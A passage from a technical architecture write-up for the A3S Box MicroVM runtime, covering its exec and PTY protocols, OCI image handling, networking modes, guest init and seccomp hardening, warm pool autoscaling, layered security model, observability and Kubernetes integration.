Maximum frame payload is 64 KiB. This limit is a deliberate tradeoff: large enough to efficiently transfer data, yet small enough to avoid memory pressure.

11.4 Exec Protocol in Detail

The Exec protocol supports two modes:

Non-streaming mode: For short commands (e.g., cat /etc/hostname)

Host --> [ExecRequest JSON] --> Guest
Host <-- [ExecOutput JSON]  <-- Guest

ExecRequest {
    cmd: ["cat", "/etc/hostname"],
    timeout_ns: 5_000_000_000,  // 5 seconds
    env: {"KEY": "VALUE"},
    working_dir: "/app",
    user: "nobody",
    streaming: false
}

ExecOutput {
    stdout: "my-hostname\n",
    stderr: "",
    exit_code: 0
}

Each stream (stdout/stderr) has a maximum of 16 MiB.

Streaming mode: For long-running commands or scenarios requiring real-time output

Host --> [ExecRequest JSON, streaming: true] --> Guest
Host <-- [ExecChunk: type=0x01, Stdout]       <-- Guest
Host <-- [ExecChunk: type=0x01, Stderr]       <-- Guest
Host <-- [ExecChunk: type=0x01, Stdout]       <-- Guest
...
Host <-- [ExecExit: type=0x02, exit_code]     <-- Guest

Streaming mode also supports file transfer:

FileRequest {
    op: Upload | Download,
    guest_path: "/data/file.txt",
    data: "base64_encoded_content"  // for Upload
}

11.5 PTY Protocol in Detail

The PTY protocol is designed for interactive terminal sessions, supporting full terminal emulation:

Frame types:
  0x01 - Request  (Host->Guest: start PTY session)
  0x02 - Data     (Bidirectional: terminal data)
  0x03 - Resize   (Host->Guest: terminal window size change)
  0x04 - Exit     (Guest->Host: process exit)
  0x05 - Error    (Guest->Host: error message)

PTY session establishment flow:

Host sends PtyRequest (containing command, environment variables, initial window size)
Guest Init calls openpty() to allocate a PTY pair
fork() creates a child process:
- Child process: setsid() -> set controlling terminal -> redirect stdio -> execvp()
- Parent process: bidirectional data forwarding between vsock and PTY master via poll() multiplexing
Terminal window size changes are passed via TIOCSWINSZ ioctl
When the child process exits, drain the PTY buffer and send a PtyExit frame

This design makes the a3s-box exec -it my-app /bin/bash experience identical to docker exec -it — supporting Tab completion, arrow key history, Ctrl+C signal forwarding, window size adaptation, and all other terminal features.

12. OCI Image Processing Pipeline: From Registry to Root Filesystem

12.1 The Complete Image Pull Chain

OCI (Open Container Initiative) images are the universal language of the container ecosystem. A3S Box fully implements the OCI image specification, allowing any standards-compliant container image to run directly in a MicroVM.

The complete image pull flow:

User request (a3s-box pull nginx:latest)
    |
    v
ImageReference parsing
    |  registry: registry-1.docker.io
    |  repository: library/nginx
    |  tag: latest
    |
    v
ImagePuller (cache-first strategy)
    |
    +-- Cache hit? --> Return local path directly
    |       |
    |       +-- Lookup by reference (tag match)
    |       +-- Lookup by digest (content dedup)
    |
    +-- Cache miss --> RegistryPuller
                    |
                    +-- Authentication (RegistryAuth)
                    |   +-- Anonymous
                    |   +-- Basic (username/password)
                    |   +-- Environment variables (REGISTRY_USERNAME/PASSWORD)
                    |   +-- CredentialStore (Docker config.json)
                    |
                    +-- Multi-arch resolution (linux_platform_resolver)
                    |   +-- x86_64 -> amd64
                    |   +-- aarch64 -> arm64
                    |
                    +-- Pull manifest + config + layers
                    |
                    +-- Store in ImageStore
                        +-- Capacity eviction (LRU)

12.2 Image Reference Parsing

ImageReference is the core type for image identification, responsible for parsing various user input formats into a standardized structure:

pub struct ImageReference {
    pub registry: String,       // e.g., "registry-1.docker.io"
    pub repository: String,     // e.g., "library/nginx"
    pub tag: Option<String>,    // e.g., "latest"
    pub digest: Option<String>, // e.g., "sha256:abc..."
}

Parsing rules are compatible with Docker conventions:

nginx -> registry-1.docker.io/library/nginx:latest
myuser/myapp:v2 -> registry-1.docker.io/myuser/myapp:v2
ghcr.io/org/tool:main -> kept as-is
registry.example.com/app@sha256:abc... -> digest reference

12.3 Multi-Architecture Image Resolution

Modern container images are typically multi-architecture — the same tag contains variants for multiple platforms like amd64 and arm64. A3S Box's linux_platform_resolver automatically selects the variant matching the host architecture:

OS is fixed to linux (MicroVM always runs a Linux kernel internally)
Architecture mapping: x86_64 -> amd64, aarch64 -> arm64

This means even when developing on an Apple Silicon Mac, A3S Box will automatically pull the arm64 variant of the image.

12.4 Caching and Deduplication

ImageStore implements two-level cache lookup:

Lookup by reference: Exact match on registry/repository:tag, for repeated pulls of the same image
Lookup by digest: Deduplication via SHA-256 content hash, avoiding duplicate storage when different tags point to the same content

Cache configuration (CacheConfig):

Parameter	Default	Description
`enabled`	`true`	Whether to enable caching
`cache_dir`	`~/.a3s/cache`	Cache directory
`max_rootfs_entries`	`10`	Maximum rootfs cache entries
`max_cache_bytes`	`10 GB`	Maximum total cache size

When the cache exceeds limits, LRU (Least Recently Used) strategy evicts the least recently used entries.

12.5 Rootfs Construction

From an OCI image to a root filesystem usable by a MicroVM, OciRootfsBuilder performs the following steps:

Layer extraction: Decompress OCI image layers in order, handling whiteout files (.wh. prefix) to implement inter-layer file deletion
Base filesystem injection: Create base files required for MicroVM operation:
- /etc/passwd: Contains root and nobody users
- /etc/group: Basic user groups
- /etc/hosts: localhost mapping
- /etc/resolv.conf: DNS configuration (default 8.8.8.8, 8.8.4.4)
- /etc/nsswitch.conf: Name service switch configuration
Directory structure creation: Ensure /dev, /proc, /sys, /tmp, /etc, /workspace, /run directories exist
Guest Layout configuration: Set path mappings for workspace_dir, tmp_dir, run_dir

12.6 Image Signature Verification

A3S Box provides an image signature verification framework, controlling verification behavior through SignaturePolicy:

pub enum SignaturePolicy {
    Skip,           // Skip verification (default)
    RequireSigned,  // Require signature
    Custom(String), // Custom policy
}

pub enum VerifyResult {
    Ok,             // Signature valid
    NoSignature,    // No signature
    Failed(String), // Verification failed
    Skip,           // Verification skipped
}

The default policy is Skip, allowing users to use the system normally without configuring signature infrastructure. In production environments, enabling RequireSigned is recommended to ensure only signature-verified images are run.

12.7 Image Pushing

RegistryPusher supports pushing locally built OCI image layouts to remote registries, returning PushResult:

pub struct PushResult {
    pub config_url: String,    // URL of the config blob
    pub manifest_url: String,  // URL of the manifest
}

The push flow follows the OCI Distribution Spec: upload config blob and layer blobs first, then upload the manifest.

13. Network Architecture: Three Flexible Modes

13.1 Network Mode Overview

MicroVM network configuration requires balancing security, performance, and ease of use. A3S Box provides three network modes covering different scenarios from development to production:

pub enum NetworkMode {
    Tsi,                        // Default: transparent socket proxy
    Bridge { network: String }, // Bridge: real network interface
    None,                       // No networking
}

13.2 TSI Mode (Default)

TSI (Transparent Socket Interception) is A3S Box's default network mode. In this mode, socket syscalls inside the MicroVM are transparently proxied to the host — the MicroVM doesn't need its own network interface, IP address, or routing table.

How it works:

Inside MicroVM                  Host
+--------------+              +--------------+
| App calls    |              |              |
| connect()    |---- vsock -->| Proxy connect()|---> Target server
| send()       |---- vsock -->| Proxy send()  |--->
| recv()       |<--- vsock ---| Proxy recv()  |<---
+--------------+              +--------------+

TSI advantages:

Zero configuration: No need to create networks, assign IPs, configure routes
Secure: MicroVM has no direct network interface, reducing attack surface
Simple: Suitable for most development and testing scenarios

TSI limitations:

Does not support direct communication between MicroVMs
Does not support listening on ports (inbound connections require port mapping)
Slightly lower performance than bridge mode (extra proxy layer)

13.3 Bridge Mode

Bridge mode provides MicroVMs with a real network interface (eth0), implementing a userspace network stack via the passt daemon. This mode is suitable for scenarios requiring inter-MicroVM communication or full network functionality.

MicroVM A                     Host                        MicroVM B
+----------+                +---------+                +----------+
| eth0     |                | PasstMgr|                | eth0     |
| 10.0.1.2 |<-- virtio -->| Bridge  |<-- virtio -->| 10.0.1.3 |
+----------+                +---------+                +----------+

Bridge mode network configuration is injected into Guest Init via environment variables:

Environment Variable	Description	Example
`A3S_NET_IP`	MicroVM IP address	`10.0.1.2/24`
`A3S_NET_GATEWAY`	Gateway address	`10.0.1.1`
`A3S_NET_DNS`	DNS server	`8.8.8.8`

Guest Init configures the network interface at startup via raw syscalls (no dependency on iproute2).

13.4 Network Configuration and IPAM

NetworkConfig defines a complete network:

pub struct NetworkConfig {
    pub name: String,
    pub subnet: String,           // CIDR format, e.g., "10.0.1.0/24"
    pub gateway: Ipv4Addr,        // Gateway address
    pub driver: String,           // Default "bridge"
    pub labels: HashMap<String, String>,
    pub endpoints: HashMap<String, NetworkEndpoint>,
    pub policy: NetworkPolicy,
    pub created_at: DateTime<Utc>,
}

The IPAM (IP Address Management) module handles automatic IP address allocation:

IPv4 IPAM (Ipam): Allocates sequentially from CIDR, skipping network address, gateway address, and broadcast address. Supports subnets with prefix length <= 30.
IPv6 IPAM (Ipam6): Supports IPv6 subnets with prefix length 64-120.

MAC address generation uses a Docker-compatible deterministic algorithm: derived from the IP address, using the 02:42:xx:xx:xx:xx prefix. This ensures the same IP always maps to the same MAC address, avoiding ARP cache inconsistency issues.

13.5 Network Policy

NetworkPolicy provides inter-MicroVM network isolation control:

pub struct NetworkPolicy {
    pub isolation: IsolationMode,
    pub ingress: Vec<PolicyRule>,
    pub egress: Vec<PolicyRule>,
}

pub enum IsolationMode {
    None,    // Default: all MicroVMs can communicate with each other
    Strict,  // Full isolation: prohibit inter-MicroVM communication
    Custom,  // Custom: rule-based access control
}

PolicyRule supports flexible rule definitions:

pub struct PolicyRule {
    pub from: String,         // Source (supports wildcard "*")
    pub to: String,           // Destination
    pub ports: Vec<u16>,      // Port list
    pub protocol: String,     // "tcp" / "udp" / "any"
    pub action: PolicyAction, // Allow / Deny
}

Custom mode uses first-match-wins rule evaluation, with default deny for unmatched traffic.

13.6 DNS Discovery

In Bridge mode, MicroVMs in the same network can discover each other by DNS name. NetworkConfig provides two key methods:

peer_endpoints(): Returns all endpoints in the same network except itself
allowed_peer_endpoints(): Applies network policy filtering on top of peer_endpoints()

This makes service discovery in microservice architectures simple — each MicroVM can find other services in the same network by name.

13.7 None Mode

None mode completely disables networking — the MicroVM has no network interfaces and cannot perform any network communication. This is suitable for pure compute workloads (such as data processing, cryptographic operations), or scenarios with extreme security requirements needing complete network isolation.

14. Guest Init: PID 1 Inside the MicroVM

14.1 Why a Custom PID 1?

In traditional Linux systems, PID 1 is typically systemd or SysVinit — responsible for mounting filesystems, starting services, and managing process lifecycles. But these general-purpose init systems are too large for MicroVMs: systemd itself has millions of lines of code, introducing unnecessary complexity and attack surface.

A3S Box's a3s-box-guest-init is a minimal PID 1 designed specifically for MicroVMs. It is compiled as a statically linked Rust binary with no dependency on any dynamic libraries (libc, libssl, etc.), minimizing attack surface and startup time.

14.2 Startup Sequence in Detail

Guest Init's startup sequence is a carefully orchestrated 12-step process:

[Step 1]  Mount base filesystems
          +-- /proc  (procfs)   -- process information
          +-- /sys   (sysfs)    -- kernel/device information
          +-- /dev   (devtmpfs) -- device nodes
          Note: ignore EBUSY errors (kernel may have pre-mounted)

[Step 2]  Mount virtio-fs shared filesystem
          +-- /workspace -- rootfs passed in from host
          +-- User volumes -- configured via BOX_VOL_<index>=<tag>:<guest_path>[:ro]

[Step 3]  Mount tmpfs
          +-- Configured via BOX_TMPFS_<index>=<path>[:<options>]

[Step 4]  Configure guest networking
          +-- configure_guest_network()
              +-- TSI mode: no configuration needed
              +-- Bridge mode: configure eth0 via raw syscalls

[Step 5]  Read-only rootfs (optional)
          +-- If BOX_READONLY=1, remount rootfs as read-only

[Step 6]  Register signal handlers
          +-- SIGTERM -> set SHUTDOWN_REQUESTED (AtomicBool)

[Step 7]  Parse execution configuration
          +-- BOX_EXEC_EXEC    -- executable path
          +-- BOX_EXEC_ARGC    -- argument count
          +-- BOX_EXEC_ARG_<n> -- each argument
          +-- BOX_EXEC_ENV_*   -- environment variables
          +-- BOX_EXEC_WORKDIR -- working directory

[Step 8]  Start container process
          +-- namespace::spawn_isolated()

[Step 9]  Start Exec server thread
          +-- vsock port 4089

[Step 10] Start PTY server thread
          +-- vsock port 4090

[Step 11] Start Attestation server thread (TEE mode only)
          +-- vsock port 4091

[Step 12] Enter main loop
          +-- Reap zombie processes + handle SIGTERM

14.3 Process Isolation Strategy

Inside the MicroVM, Guest Init starts the container process via namespace::spawn_isolated(). Notably, namespace isolation inside the MicroVM is optional — because the VM boundary itself already provides hardware-level isolation.

NamespaceConfig defines seven namespace flags:

Namespace	Function	Enabled by Default
Mount	Filesystem isolation	Yes
PID	Process ID isolation	Yes
IPC	Inter-process communication isolation	Yes
UTS	Hostname isolation	Yes
Net	Network isolation	No
User	User ID isolation	No
Cgroup	cgroup isolation	No

Three preset configurations:

default(): Mount + PID + IPC + UTS (recommended)
full_isolation(): All seven namespaces
minimal(): Mount + PID only

14.4 Security Policy Application

Before execvp(), Guest Init applies three layers of security policy:

Layer 1: PR_SET_NO_NEW_PRIVS

Using prctl(PR_SET_NO_NEW_PRIVS, 1) ensures the process and its children cannot gain new privileges via execve(). This prevents privilege escalation through SUID/SGID binaries.

Layer 2: Capability Stripping

Linux Capabilities split traditional root's full power into 41 fine-grained capabilities (from CAP_CHOWN(0) to CAP_CHECKPOINT_RESTORE(40)). Guest Init strips all Capabilities by default:

// Strip all 41 Capabilities
for cap in 0..=40 {
    libc::prctl(libc::PR_CAPBSET_DROP, cap);
}
// Clear ambient and inheritable sets
libc::prctl(libc::PR_CAP_AMBIENT, libc::PR_CAP_AMBIENT_CLEAR_ALL);

Users can selectively add or remove specific Capabilities via --cap-add and --cap-drop.

Layer 3: Seccomp BPF Filter

Seccomp (Secure Computing Mode) filters syscalls through BPF (Berkeley Packet Filter) programs. A3S Box's default Seccomp policy blocks 16 dangerous syscalls:

Syscall	Reason for Blocking
`kexec_load` / `kexec_file_load`	Prevent loading a new kernel
`reboot`	Prevent system reboot
`swapon` / `swapoff`	Prevent swap space manipulation
`init_module` / `finit_module` / `delete_module`	Prevent loading/unloading kernel modules
`acct`	Prevent enabling process accounting
`settimeofday` / `clock_settime`	Prevent modifying system time
`personality`	Prevent changing execution domain
`keyctl`	Prevent manipulating kernel keyring
`perf_event_open`	Prevent performance monitoring (side-channel risk)
`bpf`	Prevent loading BPF programs
`userfaultfd`	Prevent userspace page fault handling (exploitation risk)

The Seccomp filter also includes architecture validation: only allows syscalls for x86_64 (0xC000_003E) or aarch64 (0xC000_00B7) architectures, preventing bypass via 32-bit compatibility mode.

14.5 Graceful Shutdown

When receiving a SIGTERM signal, Guest Init executes a graceful shutdown flow:

Set the SHUTDOWN_REQUESTED flag
Forward SIGTERM to all child processes
Wait for child processes to exit (timeout CHILD_SHUTDOWN_TIMEOUT_MS = 5000ms)
Send SIGKILL to any still-alive child processes after timeout
Call libc::sync() to flush filesystem buffers
Exit with the container process's exit code (128 + signal for signal termination)

This two-phase shutdown ensures applications have the opportunity to perform cleanup operations (such as closing database connections, flushing logs), while guaranteeing the shutdown process doesn't hang indefinitely.

15. Warm Pool: The Ultimate Solution to Cold Starts

15.1 The Nature of the Cold Start Problem

Even though A3S Box has optimized MicroVM cold start time to approximately 200ms, in some scenarios this is still not enough:

Real-time API services: P99 latency requirement < 100ms; a 200ms cold start would cause first-request timeouts
Interactive AI Agents: Users expect instant responses; any perceptible delay degrades experience
Burst traffic: Large numbers of requests arriving in a short time; serial VM startup causes request backlog

The Warm Pool solves this by pre-starting a batch of MicroVMs — when a request arrives, a ready VM is directly allocated, achieving near-zero latency response.

15.2 Warm Pool Architecture

                    +-----------------------------+
                    |         WarmPool             |
                    |                              |
  acquire() ------> |  +-----+ +-----+ +-----+   |
  (get VM)          |  | VM1 | | VM2 | | VM3 |   | <- Idle VM queue
                    |  |Ready| |Ready| |Ready|   |
  release() ------> |  +-----+ +-----+ +-----+   |
  (return VM)       |                              |
                    |  +----------------------+    |
                    |  |  Background Task      |    |
                    |  |  - Evict expired VMs  |    |
                    |  |  - Replenish min_idle  |    |
                    |  |  - Auto-scaling        |    |
                    |  +----------------------+    |
                    |                              |
                    |  +----------------------+    |
                    |  |  PoolScaler           |    |
                    |  |  - Sliding window stats|    |
                    |  |  - Dynamic min_idle    |    |
                    |  +----------------------+    |
                    +-----------------------------+

15.3 Core Configuration

PoolConfig defines the warm pool's behavioral parameters:

pub struct PoolConfig {
    pub enabled: bool,          // Default false
    pub min_idle: usize,        // Minimum idle VM count, default 1
    pub max_size: usize,        // Maximum VM count in pool, default 5
    pub idle_ttl_secs: u64,     // Idle VM time-to-live, default 300 seconds
}

Parameter	Default	Tuning Advice
`min_idle`	1	Set based on average concurrency; too high wastes resources
`max_size`	5	Set based on host memory; each VM ~512 MiB
`idle_ttl_secs`	300	Shorten for sparse traffic to save resources

15.4 Acquire and Release

The core operations of the warm pool are acquire() and release():

acquire() (get VM):

Try to pop a Ready-state VM from the idle queue
If hit, record hit statistics and return directly
If miss, record miss statistics and start a new VM on demand (slow path)

release() (return VM):

Check if the pool is full (current count >= max_size)
Not full: put VM back in idle queue, reset creation time
Full: destroy VM

Hit/miss statistics are the key input for auto-scaling.

15.5 Auto-Scaling

PoolScaler dynamically adjusts min_idle based on hit rate within a sliding window, implementing adaptive resource management:

pub struct ScalingPolicy {
    pub enabled: bool,
    pub scale_up_threshold: f64,    // Default 0.3 (30% miss rate triggers scale-up)
    pub scale_down_threshold: f64,  // Default 0.05 (5% miss rate triggers scale-down)
    pub max_min_idle: usize,        // Upper limit for min_idle
    pub cooldown_secs: u64,         // Cooldown period, default 60 seconds
    pub window_secs: u64,           // Statistics window, default 120 seconds
}

Scaling decision logic:

Calculate miss rate in sliding window = miss_count / (hit_count + miss_count)

If miss rate > scale_up_threshold (0.3):
    effective_min_idle += 1  (not exceeding max_min_idle)
    Enter cooldown period

If miss rate < scale_down_threshold (0.05):
    effective_min_idle -= 1  (not below configured min_idle)
    Enter cooldown period

The cooldown period (default 60 seconds) prevents frequent adjustments during traffic fluctuations, avoiding "oscillation."

15.6 Background Maintenance

The warm pool starts a background async task that performs maintenance at max(idle_ttl / 5, 5s) intervals:

Evaluate auto-scaling: Call PoolScaler to calculate new effective_min_idle
Evict expired VMs: Check each idle VM's lifetime; destroy those exceeding idle_ttl_secs
Replenish VMs: If idle VM count is below effective_min_idle, start new VMs to replenish

15.7 Event Tracking

All key warm pool operations emit events for monitoring and debugging:

Event	Trigger
`pool.vm.acquired`	VM acquired
`pool.vm.released`	VM returned
`pool.vm.created`	New VM created
`pool.vm.evicted`	VM evicted due to expiry
`pool.replenish`	VM replenishment
`pool.autoscale`	Auto-scaling triggered
`pool.drained`	Pool drained (on shutdown)

15.8 Graceful Drain

When the system shuts down, the drain() method performs a graceful drain:

Send shutdown signal to background maintenance task
Wait for background task to complete
Destroy all idle VMs
Emit pool.drained event

This ensures no orphan VM processes are left behind when the system shuts down.

16. Seven-Layer Defense-in-Depth Security Model

16.1 The Philosophy of Defense in Depth

There is a fundamental principle in security: no single security measure is perfect. Whether encryption algorithms, access controls, or hardware isolation, all may have unknown vulnerabilities. The Defense in Depth strategy stacks multiple independent security mechanisms so that an attacker must simultaneously breach all layers to achieve their goal.

A3S Box implements seven layers of defense in depth, with each layer independently increasing the cost of attack:

16.2 Layer 1: Hardware Virtualization Isolation

This is the outermost and strongest isolation. Each MicroVM runs in an independent hardware virtualization domain (Intel VT-x / AMD-V / Apple HVF). The processor distinguishes between host mode and guest mode at the hardware level, and any sensitive operation triggers a VM Exit.

Even if an attacker gains root privileges inside a MicroVM and exploits a Linux kernel vulnerability, they can only affect that MicroVM itself — because kernel vulnerabilities cannot break through the hardware virtualization boundary.

16.3 Layer 2: Memory Encryption (TEE)

On hardware supporting AMD SEV-SNP or Intel TDX, the MicroVM's memory is hardware-encrypted. Each VM has an independent AES encryption key managed by the processor's security processor. Even if an attacker has physical access to the host (including cold boot attacks, DMA attacks), they cannot read the plaintext of VM memory.

This layer extends the threat model from "trust the host" to "trust no one" — only trust the hardware.

16.4 Layer 3: Independent Kernel

Each MicroVM runs its own Linux kernel. This means:

A kernel vulnerability in one MicroVM does not affect other MicroVMs
Kernel configuration can be optimized for the workload (minimizing attack surface)
Kernel versions can be updated independently without affecting other workloads

16.5 Layer 4: Namespace Isolation

Inside the MicroVM, container processes are further isolated through Linux namespaces. Mount, PID, IPC, and UTS namespaces are enabled by default. The significance of this layer is: even if multiple processes run inside the MicroVM, they have OS-level isolation between them.

16.6 Layer 5: Capability Stripping

The Linux Capability mechanism splits root's full power into 41 fine-grained capabilities. A3S Box strips all Capabilities by default, retaining only those explicitly needed by the application. This follows the principle of least privilege — processes only have the minimum set of permissions needed to complete their tasks.

16.7 Layer 6: Seccomp BPF Syscall Filtering

Even if a process has certain Capabilities, the Seccomp BPF filter can still block specific syscalls. A3S Box blocks 16 dangerous syscalls by default (such as kexec_load, bpf, perf_event_open), and validates the syscall architecture (preventing bypass via 32-bit compatibility mode).

16.8 Layer 7: no-new-privileges

The PR_SET_NO_NEW_PRIVS flag ensures the process and all its descendants cannot gain new privileges via execve(). This prevents attack paths that escalate privileges by executing SUID/SGID binaries.

16.9 Security Configuration Propagation

Security configuration is passed from the host to Guest Init via a set of environment variables:

Environment Variable	Description	Example
`A3S_SEC_SECCOMP`	Seccomp mode	`default` / `unconfined`
`A3S_SEC_NO_NEW_PRIVS`	no-new-privileges	`1` / `0`
`A3S_SEC_PRIVILEGED`	Privileged mode	`1` / `0`
`A3S_SEC_CAP_ADD`	Added Capabilities	`NET_ADMIN,SYS_TIME`
`A3S_SEC_CAP_DROP`	Removed Capabilities	`ALL`

Privileged mode (--privileged) simultaneously sets seccomp=unconfined, no_new_privileges=false, cap_add=ALL — this should only be used during development and debugging; strongly not recommended in production.

16.10 Attack Path Analysis

Let's analyze a hypothetical attack scenario to see how the seven layers work together:

Attacker goal: Read MicroVM B's memory data from MicroVM A

Step 1: Attacker gains application-level code execution in MicroVM A
        -> Faces Layer 7 (no-new-privileges): cannot escalate privileges
        -> Faces Layer 6 (Seccomp): dangerous syscalls blocked
        -> Faces Layer 5 (Capabilities): lacks necessary capabilities

Step 2: Assume attacker bypasses application-layer defenses, gains root
        -> Faces Layer 4 (Namespace): can only see own processes and filesystem
        -> Faces Layer 3 (Independent kernel): kernel vulnerabilities only affect own VM

Step 3: Assume attacker exploits a kernel vulnerability
        -> Faces Layer 1 (Hardware virtualization): VM Exit mechanism blocks cross-VM access
        -> Cannot read MicroVM B's memory

Step 4: Assume attacker even breaks through the virtualization layer (extremely rare)
        -> Faces Layer 2 (TEE memory encryption): MicroVM B's memory is encrypted
        -> Even if raw memory data is read, it's only ciphertext

Conclusion: The attacker must simultaneously breach all seven layers to achieve the goal.
            Each layer is independent; breaching one layer does not reduce other layers' defense strength.

17. Observability: Prometheus, OpenTelemetry, and Auditing

17.1 The Three Pillars of Observability

Running a MicroVM cluster in production requires observability. A3S Box implements the three pillars of observability: Metrics, Tracing, and Auditing.

17.2 Prometheus Metrics

RuntimeMetrics implements the MetricsCollector trait, exposing the following metrics via the Prometheus client library:

VM lifecycle metrics:

Metric Name	Type	Description
`vm_boot_duration`	Histogram	VM startup duration distribution
`vm_created_total`	Counter	Total VMs created
`vm_destroyed_total`	Counter	Total VMs destroyed
`vm_count`	Gauge	Current number of running VMs

Command execution metrics:

Metric Name	Type	Description
`exec_total`	Counter	Total commands executed
`exec_duration`	Histogram	Command execution duration distribution
`exec_errors_total`	Counter	Total execution errors

VM-level metrics:

Each VM also exposes real-time resource usage metrics:

pub struct VmMetrics {
    pub cpu_percent: Option<f32>,    // CPU usage
    pub memory_bytes: Option<u64>,   // Memory usage
}

These metrics are collected from the host's /proc filesystem via the sysinfo library, reflecting the actual resource consumption of the shim subprocess (i.e., the VM).

17.3 OpenTelemetry Distributed Tracing

A3S Box integrates the OpenTelemetry SDK to generate distributed tracing spans for key operations. This allows operators to trace the complete path of a request from CLI to runtime to shim to Guest Init.

Typical trace chain:

[a3s-box run nginx]
  +-- [runtime.create_vm]
       +-- [oci.pull_image]
       |    +-- [registry.authenticate]
       |    +-- [registry.pull_manifest]
       |    +-- [registry.pull_layers]
       +-- [rootfs.build]
       +-- [vm.start]
       |    +-- [shim.spawn]
       |    +-- [shim.wait_ready]
       +-- [vm.configure_network]

Trace data can be exported to SigNoz, Jaeger, or any backend compatible with the OTLP protocol.

17.4 Audit Log System

Audit logs are a critical component of security compliance. A3S Box's audit system is based on the W7 model (Who, What, When, Where, Why, How, Outcome), recording all security-related operations.

AuditEvent structure:

pub struct AuditEvent {
    pub id: String,                          // Unique event ID
    pub timestamp: DateTime<Utc>,            // Timestamp
    pub action: AuditAction,                 // Operation type
    pub box_id: Option<String>,              // Associated MicroVM ID
    pub actor: Option<String>,               // Actor
    pub outcome: AuditOutcome,               // Result
    pub message: Option<String>,             // Description
    pub metadata: HashMap<String, String>,   // Additional metadata
}

17.5 Audit Operation Categories

A3S Box defines 26 audit operations across seven categories:

Category	Operations	Description
Box lifecycle	Create, Start, Stop, Destroy, Restart	VM creation, start, stop, destroy, restart
Execution	Command, Attach	Command execution, terminal attach
Image	Pull, Push, Build, Delete	Image pull, push, build, delete
Network	Create, Delete, Connect, Disconnect	Network create, delete, connect, disconnect
Volume	Create, Delete	Volume create, delete
Security	SignatureVerify, AttestationVerify, SecretInject, SealData, UnsealData	Signature verify, attestation verify, key inject, data seal/unseal
Auth	RegistryLogin, Logout	Registry login, logout
System	Prune, ConfigChange	Cleanup, config change

Each audit event's result (AuditOutcome) is one of three: Success, Failure, Denied.

17.6 Audit Log Configuration

pub struct AuditConfig {
    pub enabled: bool,       // Default true
    pub max_size: u64,       // Maximum single file size, default 50 MB
    pub max_files: u32,      // Maximum number of files, default 10
}

Audit logs are written in JSON-lines format with log rotation support. When a single file reaches max_size, it automatically rotates, retaining at most max_files historical files. Total audit storage limit is max_size x max_files (default 500 MB).

Users can query audit logs via CLI:

# View all audit events
a3s-box audit

# Filter by operation type
a3s-box audit --filter "action=exec"

# Filter by MicroVM
a3s-box audit --filter "box_id=my-app"

# Filter by time range
a3s-box audit --since "2024-01-01T00:00:00Z"

17.7 Custom Audit Backend

The AuditSink trait allows users to implement custom audit event persistence backends:

pub trait AuditSink: Send + Sync {
    fn write(&self, event: &AuditEvent) -> Result<()>;
    fn flush(&self) -> Result<()>;
}

The default implementation writes events to JSON-lines files. Users can implement their own AuditSink to send events to Elasticsearch, Splunk, CloudWatch Logs, or any other log aggregation system.

18. Kubernetes Integration: CRI Runtime

18.1 The Role of CRI

CRI (Container Runtime Interface) is the standard interface defined by Kubernetes for communication between kubelet and container runtimes. By implementing CRI, A3S Box can run as a Kubernetes RuntimeClass — meaning Pods in a Kubernetes cluster can choose to run in A3S Box's MicroVMs rather than traditional runc containers.

kubelet
  |
  +-- RuntimeClass: runc (default)
  |   +-- Traditional containers (shared kernel)
  |
  +-- RuntimeClass: a3s-box
      +-- MicroVM (independent kernel + optional TEE)

18.2 BoxAutoscaler CRD

A3S Box defines a custom resource BoxAutoscaler (API Group: box.a3s.dev, version: v1alpha1) for implementing MicroVM auto-scaling in Kubernetes:

apiVersion: box.a3s.dev/v1alpha1
kind: BoxAutoscaler
metadata:
  name: my-service-autoscaler
spec:
  targetRef:
    apiVersion: box.a3s.dev/v1alpha1
    kind: BoxDeployment
    name: my-service
  minReplicas: 1
  maxReplicas: 10
  metrics:
    - type: Cpu
      target: 70          # CPU usage target 70%
    - type: Memory
      target: 80          # Memory usage target 80%
    - type: Rps
      target: 1000        # Requests per second target
    - type: Inflight
      target: 50          # Concurrent requests target
  behavior:
    scaleUp:
      stabilizationWindowSeconds: 60
      policies:
        - type: Pods
          value: 3
          periodSeconds: 60    # Scale up at most 3 per minute
    scaleDown:
      stabilizationWindowSeconds: 300
      policies:
        - type: Pods
          value: 1
          periodSeconds: 60    # Scale down at most 1 per minute
  cooldownSecs: 60

18.3 Metric Types

BoxAutoscaler supports five metric types:

Metric Type	Description	Typical Target
`Cpu`	CPU usage percentage	70%
`Memory`	Memory usage percentage	80%
`Inflight`	Current concurrent requests	50
`Rps`	Requests per second	1000
`Custom`	Custom metrics (Prometheus query)	Scenario-dependent

18.4 Instance Lifecycle

In Kubernetes integration, each MicroVM instance goes through the following state transitions:

Creating -> Booting -> Ready -> Busy -> Draining -> Stopping -> Stopped
                        ^       |
                        +-------+
                                         v (abnormal)
                                       Failed

State meanings:

Creating: Instance configuration generated, resources being allocated
Booting: MicroVM starting (kernel boot, Guest Init initialization)
Ready: Instance ready, can receive traffic
Busy: Instance processing a request
Draining: Instance draining existing requests (graceful transition before scale-down)
Stopping: Instance shutting down
Stopped: Instance stopped
Failed: Instance terminated abnormally

18.5 Scale API

ScaleRequest and ScaleResponse define the request/response protocol for scaling:

pub struct ScaleRequest {
    pub service: String,
    pub replicas: u32,
    pub config: ScaleConfig,    // image, vcpus, memory_mib, env, port_map
    pub request_id: String,
}

pub struct ScaleResponse {
    pub request_id: String,
    pub accepted: bool,
    pub current_replicas: u32,
    pub target_replicas: u32,
    pub instances: Vec<InstanceInfo>,
    pub error: Option<String>,
}

18.6 Instance Health Checks

Each instance continuously reports health status:

pub struct InstanceHealth {
    pub cpu_percent: f32,
    pub memory_bytes: u64,
    pub inflight_requests: u32,
    pub healthy: bool,
}

Health check data is used simultaneously for:

BoxAutoscaler scaling decisions
Load balancer traffic distribution
Alert system anomaly detection

18.7 Gateway Self-Registration

After a MicroVM instance starts, it self-registers with A3S Gateway via InstanceRegistration:

pub struct InstanceRegistration {
    pub instance_id: String,
    pub service: String,
    pub endpoint: String,       // Instance access address
    pub health: InstanceHealth,
    pub metadata: HashMap<String, String>,
}

When an instance stops, it sends InstanceDeregistration to cancel registration. This self-registration mechanism allows the Gateway to automatically discover and route to new instances without manual configuration.

19. SDK Ecosystem: Unified Rust, Python, and TypeScript

19.1 SDK Architecture

A3S Box's SDK uses a "implement once, bind to multiple languages" architecture:

+-----------------------------------------+
|              a3s-box-sdk (Rust)          |
|         Core: BoxSdk + BoxSandbox        |
+----------+------------+------------------+
|  Rust    |   Python   |  TypeScript      |
|  Native  |  PyO3      |  napi-rs         |
|  API     |  bindings  |  bindings        |
|          |  (async)   |  (async)         |
+----------+------------+------------------+

